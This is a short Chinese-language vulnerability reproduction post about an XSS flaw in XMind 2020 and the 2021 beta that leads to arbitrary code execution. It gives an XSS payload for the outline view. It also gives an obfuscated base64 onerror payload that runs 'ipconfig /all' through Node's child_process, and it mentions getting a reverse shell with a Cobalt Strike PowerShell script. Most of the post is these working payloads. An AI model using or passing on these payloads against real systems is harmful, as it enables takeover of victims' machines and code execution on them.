【漏洞复现】XMind2020及2021beta版本存在xss漏洞导致任意代码执行

简介

XMind是一种功能齐全的思维导图和头脑风暴工具，旨在产生想法，激发创造力，并在工作和生活中带来效率。数以百万计的用户们喜欢它

漏洞（xss）

XMind2020及2021beta版本存在xss漏洞导致任意代码执行，可直接拿到目标主机权限

下载

官方连接：
XMind2020链接：https://www.xmind.cn/download/
XMind2021bate链接：https://www.xmind.cn/xmind2021/beta/

XMind2020百度云下载：
链接：https://pan.baidu.com/s/1M_kZ5OhRgxv33OGILZuKYg
提取码：qy4k

漏洞复现

XMind2020 【xss】

payload:<audio src=x onerror=confirm("abai")>

打开XMind2020，选择大纲后将XSS粘贴进去后，按Ctrl键后输入任意字符就可以弹框了

命令执行

payload：<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

base64进行编码

执行ipconfig/all

执行whoami

反弹shell

CS生成powershell脚本